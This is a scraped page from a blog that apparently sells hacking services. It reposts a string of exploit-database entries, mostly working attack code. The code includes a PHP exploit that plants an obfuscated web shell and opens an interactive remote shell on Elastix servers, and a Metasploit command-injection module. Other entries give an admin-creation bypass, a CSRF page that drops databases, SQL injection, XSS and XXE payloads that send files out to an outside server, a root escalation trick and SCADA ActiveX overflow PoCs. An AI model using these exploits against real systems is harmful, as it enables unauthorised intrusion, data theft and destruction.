Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863158345

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
<?
echo "\n+-------------------------------------------+\n";
echo "|              Elastix <= 2.4               |\n";
echo "|         PHP Code Injection Exploit        |\n";
echo "|                  By i-Hmx                 |\n";
echo "|                sec4ever.com               |\n";
echo "|             n0p1337@gmail.com             |\n";
echo "+-------------------------------------------+\n";
echo "\n| Enter Target [https://ip] # ";
$target=trim(fgets(STDIN));
$inj='<?eval(base64_decode("JGY9Zm9wZW4oJ2ZhcnNhd3kucGhwJywndysnKTskZGF0YT0nPD8gaWYoISRfUE9TVFtwd2RdKXtleGl0KCk7fSBlY2hvICJGYXJpcyBvbiB0aGUgbWljIDpEPGJyPi0tLS0tLS0tLS0tLS0tLS0tIjtAZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtmYV0pKTtlY2hvICItLS0tLS0tLS0tLS0tLS0tLSI7ID8+Jztmd3JpdGUoJGYsJGRhdGEpO2VjaG8gImRvbmUiOwo="));
?>';
$faf=fopen("fa.txt","w+");
fwrite($faf,$inj);
fclose($faf);
$myf='fa.txt';
$url =
$target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../modules/Import/ImportStep2.php%00";
// URL
$reffer = "http://1337s.cc/index.php";
$agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4)
Gecko/20030624 Netscape/7.1 (ax)";
$cookie_file_path = "/";
echo "| Injecting 1st payload\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,array("userfile"=>"@".realpath($myf)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_REFERER, $reffer);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$result = curl_exec($ch);
curl_close($ch);
//echo $result;
echo "| Injecting 2nd payload\n";
function faget($url,$post){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
curl_setopt($curl, CURLOPT_HEADER, true);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
function kastr($string, $start, $end){
        $string = " ".$string;
        $ini = strpos($string,$start);
        if ($ini == 0) return "";
        $ini += strlen($start);
        $len = strpos($string,$end,$ini) - $ini;
        return substr($string,$ini,$len);
}
$me=faget($target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../cache/import/IMPORT_%00","");
echo "| Testing total payload\n";
$total=faget($target."/vtigercrm/farsawy.php","pwd=1337");
if(!eregi("Faris on the mic :D",$total))
{
die("[+] Exploitation Failed\n");
}
echo "| Sending CMD test package\n";
$cmd=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw==");
if(!eregi("farsawy",$cmd))
{
echo "   + Cmd couldn't executed but we can evaluate php code\n   + use :
$target//vtigercrm/fa.php\n   Post : fa=base64code\n";
}
echo "| sec4ever shell online ;)\n\n";
$host=str_replace('https://','',$target);
while(1){
echo "i-Hmx@$host# ";
$c=trim(fgets(STDIN));
if($c=='exit'){die("[+] Terminating\n");}
$payload=base64_encode("passthru('$c');");
$fuck=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=$payload");
$done=kastr($fuck,"-----------------","-----------------");
echo "$done\n";
}
/*
I dont even remember when i exploited this shit!
maybe on 2013?!
whatever , Hope its not sold as 0day in the near future xDD
*/
?>
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Endian Firewall Proxy Password Change Command Injection',
      'Description' => %q{
        This module exploits an OS command injection vulnerability in a
        web-accessible CGI script used to change passwords for locally-defined
        proxy user accounts. Valid credentials for such an account are
        required.

        Command execution will be in the context of the "nobody" account, but
        this account had broad sudo permissions, including to run the script
        /usr/local/bin/chrootpasswd (which changes the password for the Linux
        root account on the system to the value specified by console input
        once it is executed).

        The password for the proxy user account specified will *not* be
        changed by the use of this module, as long as the target system is
        vulnerable to the exploit.

        Very early versions of Endian Firewall (e.g. 1.1 RC5) require
        HTTP basic auth credentials as well to exploit this vulnerability.
        Use the USERNAME and PASSWORD advanced options to specify these values
        if required.

        Versions >= 3.0.0 still contain the vulnerable code, but it appears to
        never be executed due to a bug in the vulnerable CGI script which also
        prevents normal use (http://jira.endian.com/browse/UTM-1002).

        Versions 2.3.x and 2.4.0 are not vulnerable because of a similar bug
        (http://bugs.endian.com/print_bug_page.php?bug_id=3083).

        Tested successfully against the following versions of EFW Community:

        1.1 RC5, 2.0, 2.1, 2.2, 2.5.1, 2.5.2.

        Should function against any version from 1.1 RC5 to 2.2.x, as well as
        2.4.1 and 2.5.x.
      },
      'Author' => [
        'Ben Lincoln' # Vulnerability discovery, exploit, Metasploit module
      ],
      'References' => [
        ['CVE', '2015-5082'],
        ['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082'],
        ['EDB', '37426'],
        ['EDB', '37428']
      ],
      'Privileged'  => false,
      'Platform'    => %w{ linux },
      'Payload'        =>
        {
          'BadChars' => "\x00\x0a\x0d",
          'DisableNops' => true,
          'Space'       => 2048
        },
      'Targets'        =>
        [
          [ 'Linux x86',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ],
          [ 'Linux x86_64',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86_64,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ]
        ],
      'DefaultOptions' =>
        {
          'SSL' => true,
          'RPORT' => 10443
        },
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Jun 28 2015',
      'License' => MSF_LICENSE
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Path to chpasswd.cgi CGI script',
        '/cgi-bin/chpasswd.cgi']),
      OptString.new('EFW_USERNAME', [true,
        'Valid proxy account username for the target system']),
      OptString.new('EFW_PASSWORD', [true,
        'Valid password for the proxy user account']),
      OptString.new('RPATH', [true,
        'Target PATH for binaries used by the CmdStager', '/bin'])
     ], self.class)

    register_advanced_options(
      [
        OptInt.new('HTTPClientTimeout', [ true, 'HTTP read response timeout (seconds)', 5])
      ], self.class)

  end

  def exploit
    # Cannot use generic/shell_reverse_tcp inside an elf
    # Checking before proceeds
    if generate_payload_exe.blank?
      fail_with(Failure::BadConfig,
        "#{peer} - Failed to store payload inside executable, " +
        "please select a native payload")
    end

    execute_cmdstager(:linemax => 200, :nodelete => true)
  end

  def execute_command(cmd, opts)
    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")

    req(cmd)
  end

  def req(cmd)
    sploit = "#{datastore['EFW_PASSWORD']}; #{cmd};"

    post_data = Rex::MIME::Message.new
    post_data.add_part('change', nil, nil, 'form-data; name="ACTION"')
    post_data.add_part(datastore['EFW_USERNAME'], nil, nil, 'form-data; name="USERNAME"')
    post_data.add_part(datastore['EFW_PASSWORD'], nil, nil, 'form-data; name="OLD_PASSWORD"')
    post_data.add_part(sploit, nil, nil, 'form-data; name="NEW_PASSWORD_1"')
    post_data.add_part(sploit, nil, nil, 'form-data; name="NEW_PASSWORD_2"')
    post_data.add_part('  Change password', nil, nil, 'form-data; name="SUBMIT"')

    data = post_data.to_s
    boundary = post_data.bound

    referer_url =
      "https://#{datastore['RHOST']}:#{datastore['RPORT']}" +
      "#{datastore['TARGETURI']}"


    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => datastore['TARGETURI'],
        'ctype' => "multipart/form-data; boundary=#{boundary}",
        'headers' => {
          'Referer' => referer_url
        },
        'data' => data
      })

     if res
       if res.code == 401
         fail_with(Failure::NoAccess,
           "#{rhost}:#{rport} - Received a 401 HTTP response - " +
           "specify web admin credentials using the USERNAME " +
           "and PASSWORD advanced options to target this host.")
       end
       if res.code == 404
         fail_with(Failure::Unreachable,
           "#{rhost}:#{rport} - Received a 404 HTTP response - " +
           "your TARGETURI value is most likely not correct")
       end
     end

  end

end
HireHackking 
NETGEAR Wireless Management System - Authentication Bypass and
Privilege Escalation.
WMS5316 ProSafe 16AP Wireless Management System - Firmware 2.1.4.15
(Build 1236).


[-] Vulnerability Information:
==============================
Title: NETGEAR Wireless Management System - Authentication Bypass and
Privilege Escalation
CVE: Not assigned
Vendor: NETGEAR
Product: WMS5316 ProSafe 16AP Wireless Management System
Affected Version: Firmware 2.1.4.15 (Build 1236)
Fixed Version: Not publicly available


[-] Disclosure Timeline:
========================
22/04/2015
Vulnerability identified by Reinforce Services

23/04/2015
Support case created with NETGEAR.

24/04/2015
Vendor requested further information.

27/04/2015
Issue escalated within NETGEAR.

30/04/2015
Issue confirmed by vendor.

18/05/2015
Vendor confirmed issue present in other controllers (details unknown)
Beta update for WMS5316 expected first week of June.

06/25/2015
Vendor releases firmware version 2.1.5 that now contains a fix.
http://downloadcenter.netgear.com/en/product/WMS5316#
http://kb.netgear.com/app/answers/detail/a_id/29339
(Note: This has not been tested to confirm the issue is resolved)


[-] Proof of Concept:
=================
wget --keep-session-cookies --save-cookies=cookies.txt
--post-data="reqMethod=auth_user&jsonData=%7B%22user_name%22%3A%20%22ANYTHING%22%2C%20%22password%22%3A%20%22&%22%7D"
http://192.168.1.2/login_handler.php && wget
--load-cookies=cookies.txt
--post-data="reqMethod=add_user&jsonData=%7B%22user_name%22%3A%20%22newusername%22%2C%20%22password%22%3A%20%22newpassword%22%2C%20%22re_password%22%3A%20%22newpassword%22%2C%20%22type%22%3A%20%222%22%7D"
http://192.168.1.2/request_handler.php


[-] Vulnerability Details:
==========================
The process to bypass authentication and escalate privileges is as follows:

One:
Include the "&" symbol anywhere in the password value in the login
request (as raw content - it must not be encoded).

Two:
After a moment, the system will accept those credentials and grant
access to the GUI. The account appears somewhat restricted - but this
is only client side.

Three:
Send a request to add a new administrative user.

Four:
The new admin account is then available for use as created above.

Note: As an alternative, it is trivial to modify the Java code on it's
way down to a browser to enable all of the admin functions rather than
creating a new user.
This worked as well - so it's not strictly necessary to create a new
user; the bypass 'user' has full admin access if needed (leaving less
indicators of compromise)


[-] Credits:
============
Vulnerability discovered by Elliott Lewis of Reinforce Services


[-] Copyright:
==============
Copyright (c) Reinforce Services Limited 2015, All rights reserved
worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered
in any way without the express written consent of Reinforce Services
Limited.


[-] Disclaimer:
===============
The information herein contained may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties, implied or otherwise, with regard to this
information or its use. Any use of this information is at the user's
risk. In no event shall the author/distributor (Reinforce Services
Limited) be held liable for any damages whatsoever arising out of or
in connection with the use or spread of this information.
HireHackking 
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-JSPMYSQLADMINISTRADOR-0904.txt



Vendor:
================================
JSPMySQL Administrador
https://sites.google.com/site/mfpledon/producao-de-software



Product:
================================
JSPMySQL Administrador v.1 is a remote administration of MySQL databases
that are on a Web server using JSP technology


Vulnerability Type:
===================
CSRF & XSS



CVE Reference:
==============
N/A




Vulnerability Details:
=====================

1) No CSRF token exists allowing remote attackers to run arbitrary SQL
commands
on the MySQL database.

2) XSS entry point exists on the listaBD2.jsp web page opening up the
application
for client side browser code execution.

In either case get victim to visit our malicious webpage or click on our
malicious linx then KABOOOOOOOOOOOOOOOOOOOOOOM!!!




Exploit code(s):
===============

1- CSRF to drop the default MySQL database on the remote server:
----------------------------------------------------------------

<!DOCTYPE>
<html>
<head>
<title>JSP-MYSQL-ADMIN-CSRF</title>

<body onLoad="doit()">

<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}

<!-- CSRF DROP MYSQL DATABASE -->

<form id="HELL" action="http://localhost:8081/sys/sys/listaBD2.jsp"
method="post">
<input type="text" name="cmd" value="DROP DATABASE mysql"/>
<input type="text" name="btncmd" value="Enviar" />
<input type="text" name="bd" value="mysql" />
</form>



2- XSS client side code execution delivered to the victim:
----------------------------------------------------------

http://localhost:8081/sys/sys/listaBD2.jsp?bd=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E





Disclosure Timeline:
=========================================================


Vendor Notification:  August 31, 2015
September 4, 2015  : Public Disclosure




Exploitation Technique:
=======================
Remote



Severity Level:
=========================================================
High



Description:
==========================================================


Request Method(s):              [+] POST & GET


Vulnerable Product:             [+] JSPMySQL Administrador v.1


Vulnerable Parameter(s):        [+] cmd, bd


Affected Area(s):               [+] listaBD2.jsp


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
HireHackking
source: https://www.securityfocus.com/bid/56774/info Multiple Fortinet FortiWeb Appliances are prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. The following FortiWeb application series are vulnerable: FortiWeb-4000C FortiWeb-3000C/3000CFsx FortiWeb-1000C FortiWeb-400C and FortiWeb Virtual Appliance https://www.example.com/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C https://www.example.com/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0
HireHackking

WordPress Plugin Zingiri Forums - 'language' Local File Inclusion

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56777/info The Zingiri Forums plugin for WordPress is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. http://www.example.com/wp-content/plugins/zingiri-forum/mybb/memberlist.php?language=[Directory or file]
HireHackking

Sourcefabric Newscoop - 'f_email' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56800/info Newscoop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Newscoop 4.0.2 is vulnerable; other versions may also be affected. Script: /admin/password_recovery.php Payload: f_post_sent=1&f_email=example@example.com' and (select if(substr(password_reset_token,15,1)='1',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password
HireHackking
IBM AIX High Availability Cluster Multiprocessing (HACMP) LPE to root 0day Let's kill some more bugs today and force vendor improvement :) """ $ cat /tmp/su #!/bin/sh /bin/sh $ chmod +x /tmp/su $ PATH=/tmp /usr/es/sbin/cluster/utilities/clpasswd # /usr/bin/whoami root """ References: https://en.wikipedia.org/wiki/IBM_High_Availability_Cluster_Multiprocessing http://www-01.ibm.com/support/knowledgecenter/SSPHQG_6.1.0/com.ibm.hacmp.admngd/ha_admin_clpasswd.htm -- Kristian Erik Hermansen (@h3rm4ns3c) https://www.linkedin.com/in/kristianhermansen --
HireHackking
Introduction ********************************************************************************* Using Advantech WebAccess SCADA Software we can remotely manage Industrial Control systems devices like RTU's, Generators, Motors etc. Attackers can execute code remotely by passing maliciously crafted string to ConvToSafeArray API in ASPVCOBJLib.AspDataDriven ActiveX. Operating System: Windows SP1 Affected Product: Advantech WebAccess 8.0, 3.4.3 Vulnerable Program: AspVCObj.dll CVE-2014-9208 ********************************************************************************* Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX UpdateProject Overflow Remote Code Execution" ********************************************************************************* <?XML version='1.0' standalone='yes' ?> <html> <object classid='clsid:3703BA5D-7329-4E60-A1A5-AE7D6DF267C1' id='target' /> <script language='vbscript'> <!-- targetFile = "C:\WebAccess\Node\webdobj.dll" prototype = "Sub UpdateProject ( ByVal WwwPort As String , ByVal ProjName As String , ByVal ProjIP As String , ByVal ProjPort As Long , ByVal ProjTimeout As Long , ByVal ProjDir As String )" --> arg1="defaultV" arg2="defaultV" arg3=String(1044, "A") arg4=1 arg5=1 arg6="defaultV" target.UpdateProject arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 </script></html> </html> ********************************************************************************* Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX InterfaceFilter Overflow Remote Code Execution" ********************************************************************************* <?XML version='1.0' standalone='yes' ?> <html> <object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' /> <script language='vbscript'> <!-- targetFile = "C:\WebAccess\Node\AspVCObj.dll" prototype = "Function InterfaceFilter ( ByVal Interface As String ) As String" --> arg1=String(1044, "A") target.InterfaceFilter arg1 </script></html> ********************************************************************************* Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX FileProcess Overflow Remote Code Execution" ********************************************************************************* <?XML version='1.0' standalone='yes' ?> <html> <object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' /> <script language='vbscript'> <!-- targetFile = "C:\WebAccess\Node\AspVCObj.dll" prototype = "Sub FileProcess ( ByVal Type As Integer , ByVal FileName As String )" --> arg1=1 arg2=String(1044, "A") target.FileProcess arg1 ,arg2 </script></html> ********************************************************************************* Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX GetWideStrCpy Overflow Remote Code Execution" ********************************************************************************* <?XML version='1.0' standalone='yes' ?> <html> <object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' /> <script language='vbscript'> <!-- targetFile = "C:\WebAccess\Node\AspVCObj.dll" prototype = "Function GetWideStrCpy ( ByVal Type As Integer , ByVal inStr As String ) As String" --> arg1=1 arg2=String(1044, "A") target.GetWideStrCpy arg1 ,arg2 </script></html> ********************************************************************************* Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX GetRecipeInfo Overflow Remote Code Execution" ********************************************************************************* <?XML version='1.0' standalone='yes' ?> <html> <object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' /> <script language='vbscript'> <!-- targetFile = "C:\WebAccess\Node\AspVCObj.dll" prototype = "Function GetRecipeInfo ( ByVal Type As Integer , ByVal filePath As String )" --> arg1=1 arg2=String(1044, "A") target.GetRecipeInfo arg1 ,arg2 </script></html> ********************************************************************************* Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX GetLastTagNbr Overflow Remote Code Execution" ********************************************************************************* <?XML version='1.0' standalone='yes' ?> <html> <object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' /> <script language='vbscript'> <!-- targetFile = "C:\WebAccess\Node\AspVCObj.dll" prototype = "Function GetLastTagNbr ( ByVal TagName As String ) As String" --> arg1=String(1044, "A") target.GetLastTagNbr arg1 </script></html> ********************************************************************************* Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX ConvToSafeArray Overflow Remote Code Execution" ********************************************************************************* <?XML version='1.0' standalone='yes' ?> <html> <object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' /> <script language='vbscript'> <!-- targetFile = "C:\WebAccess\Node\AspVCObj.dll" prototype = "Function ConvToSafeArray ( ByVal ArrSize As Integer , ByVal inStr As String )" --> arg1=1 arg2=String(2068, "A") target.ConvToSafeArray arg1 ,arg2 </script></html> ********************************************************************************* Vulnerabilities were reported to Advantech sometime in January/February 2015, coordinated through CSOC.From April 2015 they has been postponing the fix.
HireHackking
source: https://www.securityfocus.com/bid/56860/info The Simple Gmail Login plugin for Wordpress is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. Simple Gmail Login 1.1.3 and prior are vulnerable. Fatal error: Uncaught exception 'Exception' with message 'DateTimeZone::__construct() [<a href='datetimezone.--construct'>datetimezone.--construct</a>]: Unknown or bad timezone ()' in C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php:229 Stack trace: #0 C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php(229): DateTimeZone->__construct('') #1 C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php(210): SimpleGmail_Plugin->log('Plugin activate...', false) #2 [internal function]: SimpleGmail_Plugin->activate('') #3 C:\xampp\htdocs\wordpress\wp-includes\plugin.php(403): call_user_func_array(Array, Array) #4 C:\xampp\htdocs\wordpress\wp-admin\plugins.php(157): do_action('activate_simple...') #5 {main} thrown in C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php on line 229
HireHackking

FOOT Gestion - 'id' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/56862/info FOOT Gestion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?page=contacter.php&id=-1 union select 1,2--%20
HireHackking

Qlikview 11.20 SR11 - Blind XML External Entity Injection

HACKER · %s · %s

Exploit Title: Qlikview blind XXE security vulnerability Product: Qlikview Vulnerable Versions: v11.20 SR11 and previous versions Tested Version: v11.20 SR4 Advisory Publication: 08/09/2015 Latest Update: 08/09/2015 Vulnerability Type: Improper Restriction of XML External Entity Reference [CWE-611] CVE Reference: CVE-2015-3623 Credit: Alex Haynes Advisory Details: (1) Vendor & Product Description -------------------------------- Vendor: QLIK Product & Version: QlikView v11.20 SR4 Vendor URL & Download: http://www.qlik.com/us/explore/products/qlikview Product Description: "The QlikView Business Discovery platform delivers true self-service BI that empowers business users by driving innovative decision-making." (2) Vulnerability Details: -------------------------- The Qlikview platform is vulnerable to XML External Entity (XXE) vulnerabilities. More specifically, the platform is susceptible to DTD parameter injections, which are also "blind" as the server feeds back no visual response. These vulnerabilities can be exploited to force Server Side Request Forgeries (SSRF)in multiple protocols, as well as reading and extracting arbitrary files on the server directly. Proof of concept for XXE [CVE-2015-5361]: ----------------------------------------- URL: https://<QLIKVIEW>/AccessPoint.aspx Attack Pattern for SSRF: ------------------------ In POST body: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE update [ <!ENTITY % external SYSTEM "http://yourserver.com"> %external;]> OR simply <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag PUBLIC "-//WHITE//NINJA//EN" "http://yourserver.com"> As this is a blind XXE, you will see no response from server, but yourserver.com will receive the HTTP request from the Qlikview server. Also works with FTP and HTTPS protocols. Attack Pattern for reading and extracting arbitrary files: ------------------------------------------ In POST body: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag [ <!ENTITY % remote SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % dtd SYSTEM "http://yourserver.com/test.dtd"> %dtd; %send; ]]> The test.dtd file on yourserver.com will need to contain the following: Test.dtd -------- <!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://yourserver.com/?%remote;'>"> %all; As the response is blind, you will see no response from the server, but yourserver.com will receive the file contents as part of the URL in lieu of the %remote parameter. (3) Advisory Timeline: ---------------------- 29/04/2015 - First Contact informing vendor of vulnerability 30/04/2015 - Response requesting details of vulnerability. Details sent 05/05/2015 - Vendor indicates issue is under investigation. 06/05/2015 - Vendor confirms vulnerability and has started working on resolving the issue. 20/05/2015 - Vendor confirms root cause has been identified and patch is under internal testing. 08/06/2015 - Vendor confirms patch ready and requests 90 day restraint on vulnerability release to give clients time to patch. 10/06/2015 - Patch 11.20 SR12 released, fixing the vulnerability 08/09/2015 - Public disclosure of vulnerability. (4)Solution: ------------ Upgrade to QV11.20 SR12 will correct the vulnerability. (5) Credits: ------------ Discovered by Alex Haynes References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3623 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3623
HireHackking

Auto-Exchanger 5.1.0 - Cross-Site Request Forgery

HACKER · %s · %s

<!-- # Exploit Title: [Auto-exchanger version 5.1.0 Xsrf] # Date: [2015/06/05] # Exploit Author: [Aryan Bayaninejad] # Linkedin : [https://www.linkedin.com/profile/view?id=276969082] # Vendor Homepage: [www.auto-exchanger.com] # Version: [Version 5.1.0] # Demo : www.farhadexchange.com # CVE : [CVE-2015-6827] ------------------------------------ details: ------------------------------------ auto-exchanger version 5.1.0 suffers from an xsrf vulnerability , attacker is able to abuse of this vulnerability to change password by a hidden iframe in another page. ------------------------------------- Exploit: ------------------------------------- --> <html> <body> <iframe style="display:none" name="xsrf-frame"></iframe> <form method='POST' action='http://farhadexchange.com/signup.php' target="xsrf-frame" id="xsrf-form"> <label id="lbl_error" name="lbl_error" class="ErrorMessage"></label> <INPUT type="hidden" name="suser" value="victim_user"> <input type="hidden" name="section" value="do_update" /> <label type='hidden' id="n_password0"><span> <input type='hidden' maxlength="20" size="30" name="password0" id="password0" value="testpassword123456" > </label> <input type="hidden" name="rid" value="" /> <label id="n_password"> <input type="hidden" maxlength="20" size="30" name="password1" id="password1" value="testpassword123456" ></label> <label id="n_mail"> <INPUT type='hidden' maxLength=60 size=30 name="mail" id="mail" value="victim_email" type="text"> </label> <label id="n_country"> <input type='hidden' name="country" id="country" style="width:196;" value="IR"> </label> <label id="cid"> <input type='hidden' name='cid' value='2'/> </label> <label id="n_curreny_account"> <INPUT type='hidden' maxLength=60 size=30 name="curreny_account" id="curreny_account" value="" ><br> </label> </form> <script>document.getElementById("xsrf-form").submit()</script> </body> </html>
HireHackking
Yet Another Use After Free Vulnerability in unserialize() with SplDoublyLinkedList Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.8.27 Release Date: 2015.9.4 A use-after-free vulnerability was discovered in unserialize() with SplDoublyLinkedList object's deserialization and crafted object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely. Affected Versions ------------ Affected is PHP 5.6 < 5.6.13 Affected is PHP 5.5 < 5.5.29 Affected is PHP 5.4 < 5.4.45 Credits ------------ This vulnerability was disclosed by Taoguang Chen. Description ------------ while(*p == ':') { ++p; ALLOC_INIT_ZVAL(elem); if (!php_var_unserialize(&elem, &p, s + buf_len, &var_hash TSRMLS_CC)) { zval_ptr_dtor(&elem); goto error; } spl_ptr_llist_push(intern->llist, elem TSRMLS_CC); } It has been demonstrated many times before that __wakeup() leads to ZVAL is freed from memory. However during deserialization will still allow to use R: or r: to set references to that already freed memory. It is possible to use-after-free attack and execute arbitrary code remotely. Proof of Concept Exploit ------------ The PoC works on standard MacOSX 10.11 installation of PHP 5.6.12. <?php class obj { var $ryat; function __wakeup() { $this->ryat = 1; } } $fakezval = ptr2str(1122334455); $fakezval .= ptr2str(0); $fakezval .= "\x00\x00\x00\x00"; $fakezval .= "\x01"; $fakezval .= "\x00"; $fakezval .= "\x00\x00"; $inner = 'i:1234;:i:1;'; $exploit = 'a:5:{i:0;i:1;i:1;C:19:"SplDoublyLinkedList":'.strlen($inner).':{'.$inner.'}i:2;O:3:"obj":1:{s:4:"ryat";R:3;}i:3;a:1:{i:0;R:5;}i:4;s:'.strlen($fakezval).':"'.$fakezval.'";}'; $data = unserialize($exploit); var_dump($data); function ptr2str($ptr) { $out = ''; for ($i = 0; $i < 8; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } ?> Test the PoC on the command line: $ php uafpoc.php array(5) { [0]=> int(1) [1]=> &int(1) [2]=> object(obj)#2 (1) { ["ryat"]=> &int(1) } [3]=> array(1) { [0]=> int(1122334455) <=== so we can control the memory and create fake ZVAL :) } [4]=> string(24) "?v?B????" }
HireHackking

VoipNow Service Provider Edition - Arbitrary Command Execution

HACKER · %s · %s

